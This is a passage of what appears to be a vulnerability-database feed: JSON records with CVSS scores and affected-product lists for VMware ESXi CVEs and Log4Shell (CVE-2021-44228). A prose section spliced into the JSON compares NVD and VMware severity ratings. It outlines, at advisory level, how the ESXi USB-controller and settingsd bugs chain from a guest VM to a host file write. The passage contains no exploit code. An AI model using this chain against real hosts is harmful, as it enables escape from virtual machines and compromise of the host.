"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-17T12:28:57", "id": "HIVEPRO:28A01D4CBC8A05BECFBA17B5AF4793F1", "href": "https://www.hivepro.com/iranian-hackers-leveraged-log4shell-to-penetrate-us-federal-agency/", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-03T14:37:01", "description": "ESXi contains a slow HTTP POST denial-of-service vulnerability in rhttpproxy. A malicious actor with network access to ESXi may exploit this issue to create a denial-of-service condition by overwhelming rhttpproxy service with multiple requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-16T17:15:00", "type": "cve", "title": "CVE-2021-22050", "cwe": ["CWE-770"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22050"], "modified": "2022-02-25T17:57:00", "cpe": ["cpe:/o:vmware:esxi:7.0", "cpe:/o:vmware:esxi:6.5", "cpe:/o:vmware:esxi:6.7"], "id": "CVE-2021-22050", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22050", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:6.7:670-201908211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209-ug:*:*:*:*:*:*", 
"cpe:2.3:o:vmware:esxi:6.7:670-201904208-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810233:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201911001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004406:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004407:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004408:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_3:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912402:*:*:*:*:*:*", 
"cpe:2.3:o:vmware:esxi:6.7:670-201904209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202010001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810232:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202006001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201906002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218:*:*:*:*:*:*", 
"cpe:2.3:o:vmware:esxi:6.7:670-201904224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201807001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908212:*:*:*:*:*:*", 
"cpe:2.3:o:vmware:esxi:6.7:670-201904225-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908104:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810230:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202008001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202103001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908206:*:*:*:*:*:*", 
"cpe:2.3:o:vmware:esxi:6.7:670-201901403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202102001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810231:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810234:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810218:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:36:59", "description": "VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. 

## **NVD Records for the Advisory CVEs**

NVD's own records for the four ESXi bugs (all published 2022-02-16) score them lower than VMware's advisory does: NVD rates every one of them with scope unchanged (S:U), giving the two USB controller bugs 6.7 and the two settingsd bugs 7.8 and 7.5. Scanners and ticketing rules keyed to NVD base scores will therefore rank these below the "critical" the advisory assigns to the chained issues. Read together, the descriptions also spell out that chain: a guest administrator reaches the VMX process through either USB controller bug, VMX access reaches settingsd through CVE-2021-22042, and settingsd access becomes an arbitrary file write on the host through CVE-2021-22043.

* **CVE-2021-22042** (CWE-863; NVD CVSS 3.1 7.8 High, `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS 2.0 4.6): VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. A malicious actor with privileges within the VMX process only may be able to access the settingsd service running as a high-privileged user. Affected per NVD: ESXi 7.0 Update 1, 2 and 3. <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22042>
* **CVE-2021-22040** (CWE-416; NVD CVSS 3.1 6.7 Medium, `CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`; CVSS 2.0 4.6): VMware ESXi, Workstation and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. Affected per NVD: ESXi 6.5 (base release and build 650-202202401), the ESXi 6.7 base release and its 670-201806001 through 670-202111101 patch builds, and ESXi 7.0 from the base release through Update 3. <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22040>
* **CVE-2021-22043** (CWE-367; NVD CVSS 3.1 7.5 High, `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS 2.0 6.0): VMware ESXi contains a TOCTOU (time-of-check, time-of-use) vulnerability in the way temporary files are handled. A malicious actor with access to settingsd may exploit this issue to escalate their privileges by writing arbitrary files. NVD scores it as network-reachable but high-complexity (AC:H), as befits a race the attacker has to win. Affected per NVD: ESXi 7.0 Update 1, 2 and 3. <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22043>
* **CVE-2021-22041** (no CWE assigned by NVD; NVD CVSS 3.1 6.7 Medium, same vector as CVE-2021-22040; CVSS 2.0 4.6): VMware ESXi, Workstation and Fusion contain a double-fetch vulnerability in the UHCI USB controller, with the same preconditions and impact as the XHCI bug: a malicious actor with local administrative privileges on a virtual machine may execute code as the VM's VMX process on the host. Affected per NVD: ESXi 6.5 build 650-202202401, the ESXi 6.7 base release and its patch builds, ESXi 7.0 Update 1 through 3, and VMware Fusion. <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22041>

The record feed attached to this page also carries NVD's entry for Log4Shell, which is not part of VMSA-2022-0004:

* **CVE-2021-44228** (CWE-20, CWE-400, CWE-502; NVD CVSS 3.1 10.0 Critical, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`; CVSS 2.0 9.3; published 2021-12-10): Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3 and 2.3.1) JNDI features used in configuration, log messages and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0 this behavior is disabled by default; from 2.16.0 (along with 2.12.2, 2.12.3 and 2.3.1) the functionality has been removed entirely. The vulnerability is specific to log4j-core and does not affect log4net, log4cxx or other Apache Logging Services projects. NVD's affected-product list for this record runs from Apache log4j 2.0 itself through more than a hundred downstream products from Cisco, Siemens, Intel, NetApp, Debian and Fedora.
"cpe:/a:siemens:siguard_dsa:4.4", "cpe:/a:intel:system_studio:-", "cpe:/a:intel:system_debugger:-", "cpe:/a:siemens:mendix:*", "cpe:/a:siemens:sentron_powermanager:4.1", "cpe:/a:cisco:evolved_programmable_network_manager:3.0", "cpe:/a:siemens:xpedition_package_integrator:-", "cpe:/a:cisco:network_dashboard_fabric_controller:11.1\\(1\\)", "cpe:/a:cisco:sd-wan_vmanage:20.5", "cpe:/a:cisco:evolved_programmable_network_manager:3.1", "cpe:/a:cisco:unified_workforce_optimization:11.5\\(1\\)", "cpe:/a:siemens:sipass_integrated:2.80", "cpe:/a:siemens:siveillance_control_pro:*", "cpe:/a:cisco:emergency_responder:11.5\\(4.66000.14\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1l\\)", "cpe:/a:cisco:optical_network_controller:1.1", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\\(1\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.001.000", "cpe:/o:fedoraproject:fedora:35", "cpe:/o:cisco:fxos:6.7.0", "cpe:/a:siemens:energy_engage:3.1", "cpe:/a:netapp:cloud_secure_agent:-", "cpe:/a:cisco:network_dashboard_fabric_controller:11.3\\(1\\)", "cpe:/a:siemens:solid_edge_cam_pro:*", "cpe:/a:cisco:wan_automation_engine:7.5", "cpe:/a:siemens:opcenter_intelligence:3.2", "cpe:/a:cisco:cloudcenter_suite:4.10\\(0.15\\)", "cpe:/a:cisco:paging_server:8.5\\(1\\)", "cpe:/o:cisco:fxos:6.5.0", "cpe:/a:cisco:smart_phy:3.2.1", "cpe:/a:siemens:desigo_cc_advanced_reports:4.1", "cpe:/a:siemens:energyip:8.6", "cpe:/a:siemens:xpedition_enterprise:-", "cpe:/a:cisco:paging_server:9.0\\(1\\)", "cpe:/a:cisco:integrated_management_controller_supervisor:2.3.2.0", "cpe:/a:cisco:packaged_contact_center_enterprise:11.6\\(1\\)", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:cisco:unified_sip_proxy:010.002\\(000\\)", "cpe:/a:cisco:unified_sip_proxy:010.000\\(000\\)", "cpe:/a:cisco:smart_phy:3.1.2", "cpe:/a:siemens:desigo_cc_advanced_reports:5.1", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.002\\)", 
"cpe:/a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\)", "cpe:/a:cisco:cloudcenter_suite:5.4\\(1\\)", "cpe:/a:siemens:siguard_dsa:4.3", "cpe:/a:cisco:unified_customer_voice_portal:12.5\\(1\\)", "cpe:/a:intel:secure_device_onboard:-", "cpe:/a:apache:log4j:2.0", "cpe:/a:cisco:sd-wan_vmanage:20.7", "cpe:/a:siemens:spectrum_power_7:2.30", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.17900.52\\)", "cpe:/a:intel:sensor_solution_firmware_development_kit:-", "cpe:/a:cisco:sd-wan_vmanage:20.8", "cpe:/a:cisco:sd-wan_vmanage:20.3", "cpe:/a:cisco:network_assurance_engine:6.0\\(2.1912\\)", "cpe:/a:cisco:video_surveillance_manager:7.14\\(1.26\\)", "cpe:/a:cisco:unified_contact_center_enterprise:12.5\\(1\\)", "cpe:/a:cisco:crosswork_zero_touch_provisioning:3.0.0", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.000", "cpe:/a:cisco:mobility_services_engine:-", "cpe:/a:intel:genomics_kernel_library:-", "cpe:/a:cisco:wan_automation_engine:7.2.2", "cpe:/a:cisco:network_dashboard_fabric_controller:11.2\\(1\\)", "cpe:/a:siemens:siveillance_vantage:*", "cpe:/a:cisco:ucs_central_software:2.0\\(1b\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1\\)su3", "cpe:/a:cisco:automated_subsea_tuning:02.01.00", "cpe:/a:cisco:crosswork_data_gateway:3.0.0", "cpe:/a:cisco:evolved_programmable_network_manager:4.0", "cpe:/a:cisco:unified_customer_voice_portal:12.5", "cpe:/a:cisco:unified_sip_proxy:010.002\\(001\\)", "cpe:/a:siemens:energyip:8.5", "cpe:/a:cisco:video_surveillance_manager:7.14\\(3.025\\)", "cpe:/a:cisco:network_insights_for_data_center:6.0\\(2.1914\\)", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:siemens:desigo_cc_info_center:5.0", "cpe:/a:cisco:dna_center:2.2.2.8", "cpe:/o:cisco:fxos:6.6.0", "cpe:/a:siemens:siveillance_command:4.16.2.1", "cpe:/a:cisco:ucs_central_software:2.0", "cpe:/a:cisco:evolved_programmable_network_manager:4.1", "cpe:/a:cisco:firepower_threat_defense:7.1.0", 
"cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(3\\)", "cpe:/a:cisco:wan_automation_engine:7.2.3", "cpe:/a:cisco:crosswork_network_automation:3.0.0", "cpe:/a:cisco:unified_communications_manager:11.5\\(1\\)", "cpe:/a:cisco:smart_phy:21.3", "cpe:/a:cisco:webex_meetings_server:4.0", "cpe:/a:cisco:virtual_topology_system:2.6.6", "cpe:/a:cisco:dna_spaces_connector:-", "cpe:/a:cisco:data_center_network_manager:11.3\\(1\\)", "cpe:/a:siemens:captial:2019.1", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.001\\)", "cpe:/a:cisco:crosswork_network_automation:-", "cpe:/a:cisco:firepower_threat_defense:6.3.0", "cpe:/a:cisco:crosswork_network_automation:2.0.0", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.000\\)", "cpe:/a:siemens:desigo_cc_advanced_reports:4.2", "cpe:/a:cisco:enterprise_chat_and_email:12.5\\(1\\)", "cpe:/a:siemens:desigo_cc_advanced_reports:4.0", "cpe:/a:cisco:webex_meetings_server:3.0", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1.22900.6\\)", "cpe:/a:intel:computer_vision_annotation_tool:-", "cpe:/a:cisco:unified_contact_center_management_portal:12.6\\(1\\)", "cpe:/a:cisco:cloudcenter_suite:5.3\\(0\\)", "cpe:/o:siemens:sppa-t3000_ses3000_firmware:*", "cpe:/a:cisco:unified_customer_voice_portal:11.6\\(1\\)", "cpe:/a:siemens:energyip:9.0", "cpe:/a:cisco:unified_customer_voice_portal:11.6", "cpe:/a:cisco:crosswork_network_automation:4.1.1", "cpe:/a:siemens:teamcenter:*", "cpe:/a:cisco:finesse:12.5\\(1\\)", "cpe:/a:cisco:identity_services_engine:2.4.0", "cpe:/a:cisco:prime_service_catalog:12.1", "cpe:/a:cisco:paging_server:8.3\\(1\\)", "cpe:/a:cisco:broadworks:-", "cpe:/a:cisco:wan_automation_engine:7.4", "cpe:/a:siemens:spectrum_power_4:4.70", "cpe:/a:cisco:smart_phy:3.1.3", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.18900.97\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.000.001", "cpe:/a:cisco:paging_server:9.0\\(2\\)", 
"cpe:/a:cisco:paging_server:14.0\\(1\\)", "cpe:/o:cisco:fxos:6.2.3", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1\\)", "cpe:/a:siemens:siguard_dsa:4.2", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.18119.2\\)", "cpe:/a:cisco:smart_phy:3.1.4", "cpe:/a:cisco:unity_connection:11.5", "cpe:/a:cisco:identity_services_engine:002.004\\(000.914\\)", "cpe:/o:cisco:fxos:6.3.0", "cpe:/a:cisco:unified_contact_center_enterprise:12.0\\(1\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.", "cpe:/a:cisco:wan_automation_engine:7.2.1", "cpe:/a:cisco:firepower_threat_defense:6.5.0", "cpe:/a:cisco:sd-wan_vmanage:20.6", "cpe:/a:cisco:unified_contact_center_express:12.6\\(2\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1k\\)", "cpe:/a:cisco:unified_intelligence_center:12.6\\(1\\)", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:cisco:intersight_virtual_appliance:1.0.9-343", "cpe:/a:cisco:connected_mobile_experiences:-", "cpe:/a:siemens:siveillance_identity:1.5", "cpe:/o:cisco:fxos:7.1.0", "cpe:/a:cisco:paging_server:8.4\\(1\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.22900.28\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1g\\)", "cpe:/a:cisco:dna_spaces:-", "cpe:/a:cisco:wan_automation_engine:7.6", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(2\\)", "cpe:/a:cisco:sd-wan_vmanage:20.6.1", "cpe:/a:siemens:energyip_prepay:3.7", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.002.000", "cpe:/a:intel:audio_development_kit:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.000", "cpe:/a:cisco:enterprise_chat_and_email:12.0\\(1\\)", "cpe:/a:cisco:unified_contact_center_enterprise:11.6\\(2\\)", "cpe:/a:siemens:comos:*", "cpe:/a:cisco:finesse:12.6\\(1\\)", "cpe:/a:cisco:evolved_programmable_network_manager:4.1.1", "cpe:/a:cisco:video_surveillance_manager:7.14\\(4.018\\)", 
